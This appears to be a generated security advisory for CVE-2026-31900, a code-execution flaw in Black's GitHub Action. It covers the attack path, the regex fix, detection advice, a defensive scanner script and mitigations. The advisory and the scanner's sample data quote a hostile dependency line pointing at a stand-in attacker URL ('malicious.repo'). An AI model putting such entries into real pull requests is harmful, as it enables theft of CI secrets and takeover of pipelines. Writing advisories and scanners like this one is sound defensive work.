CVE-2026-31900 Overview
CVE-2026-31900 is a high-severity arbitrary code execution vulnerability in the GitHub Action shipped with Black, the widely used Python code formatter. The action can read the Black version to install from the repository's pyproject.toml when its use_pyproject: true input is enabled. Because a pull request controls that file, an attacker could submit a change that replaces the version pin with a direct URL reference pointing at an attacker-controlled package, and the action would install and execute that package inside the workflow job.
Critical Impact
An attacker can execute arbitrary code inside the GitHub Actions job that runs the formatter, with whatever token permissions and secrets that job has. Depending on the workflow's trigger and permissions, this can mean exposure of repository secrets, misuse of the workflow's token, and a foothold for further compromise of the CI/CD pipeline.
Affected Products
- Black GitHub Action (psf/black) in versions prior to 26.3.0
- Workflows that run the action with the use_pyproject: true input (the formatter itself, run outside the action, is not affected)
- CI/CD pipelines that run Black's GitHub Action on pull requests from untrusted contributors
Discovery Timeline
- 2026-03-11 - CVE CVE-2026-31900 published to NVD
- 2026-03-12 - Last updated in NVD database
Technical Details for CVE-2026-31900
Vulnerability Analysis
This vulnerability stems from improper input validation (CWE-20) in the version parsing of Black's GitHub Action. The action's main.py uses a regular expression to recognise the Black entry in pyproject.toml and extract its version specification. The original pattern only checked that the package name "black" was followed by some non-identifier character and then accepted the rest of the line unchanged, so a direct URL reference to an external package source passed the check.
When a workflow runs on a pull request with use_pyproject: true enabled, the action reads the Black entry from the pull request's pyproject.toml, which is untrusted input. Because the check did not restrict that entry to a version specifier, an attacker could name an arbitrary package source, which pip then downloaded and installed, executing the package's code with the permissions of the workflow job.
Root Cause
The root cause is the permissive version specifier pattern in action/main.py. The original pattern ^black([^A-Z0-9._-]+.*)$ only requires that "black" be followed by at least one character outside A-Z, 0-9, ".", "_" and "-" (so that names such as "blackened" are not matched) and then accepts anything up to the end of the line. It does not restrict the remainder to a valid PEP 440 version specifier such as black==26.3.0, so a direct URL reference (e.g. black @ https://malicious.repo/package.tar.gz) matched and the whole string was passed through to installation during workflow execution.
Attack Vector
The attack vector is network-based and requires only the ability to open a pull request against a repository whose workflow runs the vulnerable Black GitHub Action. The exploitation path involves:
- Identifying a target repository whose workflow runs Black's GitHub Action with use_pyproject: true on pull requests
- Forking the repository and changing the Black entry in pyproject.toml to a direct URL reference pointing at an attacker-controlled package
- Opening a pull request so that the workflow runs against the modified file
- The action installs the attacker's package, whose code runs with the permissions of the workflow job, allowing exfiltration of any secrets available to that job or further tampering with the pipeline
The blast radius depends on how the workflow is triggered. For pull requests from forks run under the pull_request event, GitHub withholds repository secrets and grants the job a read-only token, so the exposure is greatest for pull requests from branches within the same repository and for workflows that use pull_request_target and check out the pull request's code.
# Security patch in action/main.py - Harden Black action version parsing (#5031)
USE_PYPROJECT = os.getenv("INPUT_USE_PYPROJECT") == "true"
OUTPUT_FILE = os.getenv("OUTPUT_FILE", default="")
-BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE)
+BLACK_VERSION_RE = re.compile(
+ r"^black((?:\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)"
+ r"(?:\s*,\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)*)\s*$",
+ re.IGNORECASE,
+)
EXTRAS_RE = re.compile(r"\[.*\]")
EXPORT_SUBST_FAIL_RE = re.compile(r"\$Format:.*\$")
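Review bot: the hardened BLACK_VERSION_RE now requires at least one comparison clause, so a bare "black" entry (or "black[jupyter]" after extras are stripped with EXTRAS_RE) no longer matches, and the no-match path is not visible in this hunk; confirm that the caller treats a non-matching entry as "use the action's default version" or fails loudly, rather than handing the raw pyproject string to pip, since that would reopen the "black @ https://..." path this change closes. A short comment above the pattern listing what it deliberately rejects (direct URL references introduced by "@", environment markers after ";", any character outside [A-Za-z0-9*+._-]) would also make the security intent clear to the next reviewer.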
Source: GitHub Commit Details
Detection Methods for CVE-2026-31900
Indicators of Compromise
- Pull requests that change the Black entry in pyproject.toml, in particular ones that replace a version pin with a direct URL reference (an "@" followed by a URL) or otherwise alter dependency sources
- Workflow run logs showing pip installing Black from a URL or from any source other than PyPI
- Unexpected use of repository secrets or unexpected workflow behaviour following CI runs on a pull request
Detection Strategies
- Require review and approval for any change to pyproject.toml or other dependency manifests before workflows that install from them are allowed to run
- Use branch protection rules and CODEOWNERS so that changes to dependency manifests and CI/CD configuration need approval from designated owners
- Monitor workflow run logs for unusual package installation commands or unexpected outbound network requests during CI execution
Monitoring Recommendations
- Surface dependency manifest changes to reviewers on every pull request, for example with GitHub's dependency review
- Scan Python dependency specifications automatically for direct URL references and other entries that are not plain version specifiers
- Review workflow run logs for installation commands that reference URLs rather than package names and versions
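The scanner below is an added example and not code from the Black project or from this advisory's source. It reuses the two patterns shown in the patch above (the permissive pre-fix pattern and the hardened one) to classify Black entries found in a pyproject.toml, so it serves both as a demonstration of the root cause (which inputs each pattern accepts) and as the kind of automated check the detection strategy recommends. It assumes, as an illustration, that the relevant entries live under project.dependencies and project.optional-dependencies, and that extras such as [jupyter] are stripped before matching, as the EXTRAS_RE pattern in main.py suggests; the sample pyproject.toml is constructed for the example and reuses the URL quoted on this page.

```python
"""Flag Black requirement strings that are not plain PEP 440 version specifiers.

Added example, not the Black project's own code. The two regexes are copied
from the patch shown on this page; everything else is illustrative.
"""
import re

try:  # tomllib is standard from Python 3.11 on; older interpreters skip TOML parsing
    import tomllib
except ImportError:  # pragma: no cover
    tomllib = None

# Permissive pattern used by the action before the fix (from the page's diff).
OLD_BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE)

# Hardened pattern from Black 26.3.0 (from the page's diff): one or more
# comparison clauses, each an operator followed by characters from a fixed set.
NEW_BLACK_VERSION_RE = re.compile(
    r"^black((?:\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)"
    r"(?:\s*,\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)*)\s*$",
    re.IGNORECASE,
)

EXTRAS_RE = re.compile(r"\[.*\]")  # same pattern as main.py; strips e.g. [jupyter]

# Assumption for this example: "black" followed by a non-identifier character
# (or end of string) names the black package; "blackened" does not.
BLACK_NAME_RE = re.compile(r"^black(?![A-Za-z0-9._-])", re.IGNORECASE)


def accepted_before_fix(req: str) -> bool:
    """True if the pre-26.3.0 pattern would have accepted this entry."""
    return OLD_BLACK_VERSION_RE.match(EXTRAS_RE.sub("", req).strip()) is not None


def accepted_after_fix(req: str) -> bool:
    """True if the hardened 26.3.0 pattern accepts this entry."""
    return NEW_BLACK_VERSION_RE.match(EXTRAS_RE.sub("", req).strip()) is not None


def classify_black_requirement(req: str) -> str:
    """Classify one requirement string.

    Returns "not_black" for other packages, "direct_url" for an "@ <url>"
    reference (the CVE-2026-31900 vector), "ok" for an entry the hardened
    pattern accepts, and "rejected" for anything else (environment markers
    after ";", a bare "black" with no specifier, stray characters). How the
    real action handles "rejected" entries is not shown on this page.
    """
    spec = EXTRAS_RE.sub("", req).strip()
    if not BLACK_NAME_RE.match(spec):
        return "not_black"
    if "@" in spec:
        return "direct_url"
    if NEW_BLACK_VERSION_RE.match(spec):
        return "ok"
    return "rejected"


def scan_requirements(reqs):
    """Return (requirement, classification) for every Black entry in reqs."""
    results = []
    for req in reqs:
        status = classify_black_requirement(req)
        if status != "not_black":
            results.append((req, status))
    return results


def scan_pyproject(text: str):
    """Scan project.dependencies and project.optional-dependencies (assumed layout)."""
    if tomllib is None:
        raise RuntimeError("TOML parsing needs Python 3.11+; use scan_requirements()")
    project = tomllib.loads(text).get("project", {})
    reqs = list(project.get("dependencies", []))
    for group in project.get("optional-dependencies", {}).values():
        reqs.extend(group)
    return scan_requirements(reqs)


# Constructed sample input for the example; the URL is the one quoted on this page.
SAMPLE_PYPROJECT = """\
[project]
name = "demo"
dependencies = ["requests>=2.31"]

[project.optional-dependencies]
dev = [
    "black @ https://malicious.repo/package.tar.gz",
    "pytest>=8",
]
"""

if __name__ == "__main__":
    if tomllib is not None:
        findings = scan_pyproject(SAMPLE_PYPROJECT)
    else:
        findings = scan_requirements(["black @ https://malicious.repo/package.tar.gz"])
    for req, status in findings:
        print(f"{status:10} {req}")
```

Running the block prints one finding, "direct_url black @ https://malicious.repo/package.tar.gz". Note that the hardened pattern also rejects environment markers (black>=24; python_version >= '3.9') and a bare black entry with no operator, so a scanner used as a pre-merge gate should report those separately from the direct URL case rather than treating every non-match as an attack.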
How to Mitigate CVE-2026-31900
Immediate Actions Required
- Update every workflow that uses the Black GitHub Action to a release of 26.3.0 or later, and confirm that the tag the workflow references (for example stable) now resolves to a fixed release
- Review recent pull requests, merged or not, for changes to the Black entry in pyproject.toml, especially direct URL references
- Audit the permissions granted to affected workflows and rotate any secrets that were available to jobs that ran against untrusted pull requests
Patch Information
The vulnerability is fixed in Black 26.3.0. The patch replaces the version parsing regular expression with one that accepts only PEP 440 style comparison clauses (an operator followed by version characters, optionally comma-separated), which rejects direct URL references and other inputs that are not version specifiers. The fix is in commit 0a2560b981364dde4c8cf8ce9d164c40669a8611. For details, see the GitHub Security Advisory.
Workarounds
- Do not set use_pyproject: true in the Black GitHub Action; instead pin the Black version with the action's version input in the workflow file, which the pull request cannot change
- Require approval before workflows run for pull requests from outside contributors, so untrusted changes do not trigger CI automatically
- Treat pull_request_target workflows with particular care: they run with the base repository's secrets, so they must not check out the pull request's head and then run the action against its pyproject.toml; check out only trusted code from the base branch
# Configuration example: pin the Black version in the workflow instead of
# reading it from the pull request's pyproject.toml (use_pyproject: true)
steps:
  - uses: actions/checkout@v4
  - uses: psf/black@stable
    with:
      options: "--check --diff"
      src: "."
      version: "26.3.0"
      # Leave use_pyproject unset (it is opt-in) in workflows that run on
      # pull requests from external contributors
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


